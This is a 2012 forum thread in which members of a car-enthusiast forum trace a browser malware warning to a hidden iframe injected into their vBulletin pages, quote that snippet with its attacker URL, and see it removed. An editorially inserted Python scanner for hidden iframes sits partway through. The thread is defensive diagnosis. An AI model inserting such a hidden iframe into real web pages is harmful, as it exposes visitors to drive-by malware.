
Google Now Warning Site Unsafe



DeLorean160
04-11-2012, 07:09 AM
When I go to this site using Google Chrome as my browser it gives me this message. It just started doing this the past day or so. Is this happening to anyone else?


DeLorean160
04-11-2012, 07:45 AM
Apologies for the duplicate thread. I just noticed somebody already made a thread about this:

http://dmctalk.org/showthread.php?3624-Hey-mods-google-says-there-is-a-problem-here...

sean
04-11-2012, 07:46 AM
Chrome
Firefox
IE

All google fine for me, no warning like that when I search for the site and click on it. I'm using a PC and an iPad.

Jimmyvonviggle
04-11-2012, 07:56 AM
I got a warning as well the last two days. My Anti Virus software said it blocked the attack in all cases.

Ron
04-11-2012, 08:21 AM
FWIW, using IE and viewing the source, the following is in several pages here:

<div style='display:none'><iframe width='9' height='6' src='http://mavmor.in/loop.php' frameborder='0' scrolling='no'></iframe></div>

ccurzio
04-11-2012, 08:33 AM
I suspect it's something on each of the computers themselves that's manipulating the search results and/or code on the forum, but I'd like to take a closer look. I've tried duplicating the issue with Safari and Firefox on my MacBook Pro, Safari on my iPad, and Internet Explorer on my Windows 7 work laptop and I cannot reproduce it. That being said, these are all known-clean machines.

Ron, if you can get me the URLs for where you're seeing that source or at least MORE of the source, I can investigate further.

Mike C.
04-11-2012, 09:09 AM
Just tried all browsers as well and no issues.


Went to my office and logged in on 3 different computers with Chrome, FF, IE with no issues either.

ccurzio
04-11-2012, 09:09 AM
Never mind, found it. Fired up Vista in a VM and used IE to access the home page. Sure enough, I found the div.

The forum *may* be compromised. I'm still looking to see what's generating the code.

ccurzio
04-11-2012, 09:28 AM
Okay, there's good news and bad news. The good news is, there's no client-side compromise that's causing the search results and code to be manipulated. So everyone's computer is safe, at least as far as THIS specific issue.

The bad news is, it's definitely a server-side compromise of some sort:


ccurzio@Defiant:~$ lynx -source http://dmctalk.org/forum.php | grep mavmor
<div style='display:none'><iframe width='9' height='6' src='http://mavmor.in/loop.php' frameborder='0' scrolling='no'></iframe></div>

Something on the server is inserting this particular snippet of code into the pages of the site, just above the footer. I thought it interesting when I got a warning from IE that "This site uses Java" (I got a warning because I don't have a Java Runtime installed in my VM) and I suspect this is some kind of drive-by attack.

Still investigating.
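The `lynx -source ... | grep mavmor` check above only works once you already know the injected hostname. As an added example (not code from the thread or from vBulletin), this scanner parses page HTML and flags any iframe that sits inside a display:none container, is only a few pixels in size, or points off-site; the sample HTML is constructed from the snippet quoted in the thread, and the site hostname is passed in by the caller.

```python
# Added example, not from the thread: flag hidden, tiny or off-site iframes in page HTML.
from html.parser import HTMLParser
from urllib.parse import urlparse

VOID_TAGS = {"br", "hr", "img", "input", "link", "meta", "source", "wbr"}  # never wrap content

def _hidden(attrs): return "display:none" in (attrs.get("style") or "").replace(" ", "").lower()

def _px(value):  # '9' or '9px' -> 9; None if not numeric
    digits = "".join(c for c in (value or "") if c.isdigit())
    return int(digits) if digits else None

class HiddenIframeFinder(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.open_tags = []  # (tag, is_hidden) for every element still open
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "iframe":
            self._check(attrs)
        if tag not in VOID_TAGS:
            self.open_tags.append((tag, _hidden(attrs)))

    def handle_endtag(self, tag):
        for i in range(len(self.open_tags) - 1, -1, -1):  # pop back to the matching open tag
            if self.open_tags[i][0] == tag:
                del self.open_tags[i:]
                break

    def _check(self, attrs):
        reasons = []
        if _hidden(attrs) or any(h for _, h in self.open_tags):
            reasons.append("hidden")  # inside display:none, like the injected div
        w, h = _px(attrs.get("width")), _px(attrs.get("height"))
        if (w is not None and w <= 10) or (h is not None and h <= 10):
            reasons.append("tiny")  # a 9x6 frame is not meant to be seen
        host = (urlparse(attrs.get("src") or "").hostname or "").lower()
        if host and host != self.site_host and not host.endswith("." + self.site_host):
            reasons.append("offsite:" + host)
        if reasons:
            self.findings.append({"src": attrs.get("src"), "reasons": reasons})

def find_suspicious_iframes(html, site_host):
    finder = HiddenIframeFinder(site_host)
    finder.feed(html)
    return finder.findings

# Constructed sample: the snippet quoted in this thread next to a benign visible embed.
SAMPLE_HTML = """<iframe width='560' height='315' src='http://dmctalk.org/embed/1'></iframe>
<div style='display:none'><iframe width='9' height='6' src='http://mavmor.in/loop.php' frameborder='0' scrolling='no'></iframe></div>"""
```

Feed it the output of `lynx -source` for each page and anything it returns is worth a look, since a legitimate embed has no reason to be hidden and six pixels tall.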

sean
04-11-2012, 09:35 AM
Seems other vBulletin owners have the issue as well:
https://www.vbulletin.com/forum/showthread.php/399467-4-0-8-suspicious-code-from-mavmor-in

Dangermouse
04-11-2012, 09:40 AM
Seems other vBulletin owners have the issue as well:
https://www.vbulletin.com/forum/showthread.php/399467-4-0-8-suspicious-code-from-mavmor-in

I saw that, but didn't post as I assumed you guys are members there.

As an aside, I like the fact that the actual vbulletin forum is running 4.1.12, while dmctalk is on 4.1.3 :)

nofear365
04-11-2012, 09:42 AM
It wasn't until I installed the latest release of Chrome that I got this warning.

sean
04-11-2012, 09:45 AM
I saw that, but didn't post as I assumed you guys are members there.

As an aside, I like the fact that the actual vbulletin forum is running 4.1.12, while dmctalk is on 4.1.3 :)

Yeah we're members. We are working towards a solution.

ccurzio
04-11-2012, 09:45 AM
Okay, so I have more good news and more bad news.

The good news is, whatever malware was present on "http://mavmor.in/loop.php" seems to be gone. So anyone visiting dmctalk.org should be safe for the time being since the only thing at that address right now is a blank page. (I even tried hitting it with a referer forged as dmctalk and it still returned a blank page.)

Bad news? It seems the forum is still vulnerable. I don't have access to the server itself so I can't investigate its code, but the installed version of vbulletin does have known injection vulnerabilities and is pretty far out of date.

Farrar
04-11-2012, 10:24 AM
Not sure how many folks here are running the Ubuntu or Mint flavours of Linux, but if you have Domain Blocker installed, you can simply block mavmor.in and use the forum as usual. You could also edit (gedit) /etc/hosts and assign mavmor.in to 127.0.0.1.

ccurzio
04-11-2012, 10:31 AM
Not sure how many folks here are running the Ubuntu or Mint flavours of Linux, but if you have Domain Blocker installed, you can simply block mavmor.in and use the forum as usual.

Not really necessary, since mavmor.in has been emptied out.


You could also edit (gedit) /etc/hosts and assign mavmor.in to 127.0.0.1.

This has never been a great idea, either. The hosts file is a network management file meant for static mapping of hosts to IPs, and was never meant as a mechanism for blocking malicious sites. Beyond that, doing so only works if you process files before DNS in nsswitch.conf, and not all systems are configured that way. So in reality it might not be doing anything whatsoever.

It's just not a good idea to do this. That's not what the hosts file is for, really.

Farrar
04-11-2012, 10:37 AM
It's just not a good idea to do this. That's not what the hosts file is for, really.

As a temporary measure I think it would be fine.

DMCMW Dave
04-11-2012, 10:51 AM
.....As if 99% of the users here understood the last 4 posts. . . .:hmm:

Jonathan
04-11-2012, 10:56 AM
.....As if 99% of the users here understood the last 4 posts. . . .:hmm:

LOL, I'm pretty sure if you tighten it where it goes into the Lambda counter you're good to go! ;)

ccurzio
04-11-2012, 10:58 AM
If you carb your DeLorean the forum will be fixed. http://i.imgur.com/kviRP.gif

Notifier
04-11-2012, 11:28 AM
.....As if 99% of the users here understood the last 4 posts. . . .:hmm:

That's OK Dave, as far as I understand it the internet is just a series of tubes...

http://www.thedailyshow.com/watch/wed-july-12-2006/headlines---internet?xrs=share_copy

DMCVegas
04-11-2012, 11:38 AM
Granted it might be because the site has been taken down, but IE, Firefox, and Safari in XP all brought up the site with no problems. OS X was fine too over the past few days, so it wasn't related to the recent Mac Java exploit (no pop-up window asking for an Admin password for Terminal code being executed in the background).

Did anyone get a warning as to what the specific malware was?

qwerk
04-11-2012, 12:23 PM
Not sure how many folks here are running the Ubuntu or Mint flavours of Linux, but if you have Domain Blocker installed, you can simply block mavmor.in and use the forum as usual. You could also edit (gedit) /etc/hosts and assign mavmor.in to 127.0.0.1.

I'm a Lubuntu guy myself, ever since they started using the Unity DE in Ubuntu. Seems like the threat is pretty minimal though, if it's just bringing up a blank page.

Tamir A.
04-11-2012, 01:45 PM
After talking to vbulletin tech support, I've removed the bad script, so all should be good now. And an upgrade will probably take place tonight, so the forum may be down for a short time period later tonight.

Tamir

ccurzio
04-11-2012, 01:51 PM
Thanks, Tamir!

Tamir A.
04-11-2012, 03:43 PM
Forum back up. Apologies for the longer than stated delay. Server issues hampered my backup, and after fixing the malware issue, I wanted to ensure a clean backup to avoid any other issues that may arise with updating software later, etc.

All should be good for now, thank you for your patience.

Tamir

Dracula
04-11-2012, 07:58 PM
.....As if 99% of the users here understood the last 4 posts. . . .:hmm:

I've been making money servicing 8-Track players. Of course I have NO IDEA what any of that means. Though, if the repair shop is right, I need a new computer troll in order to get to the internet.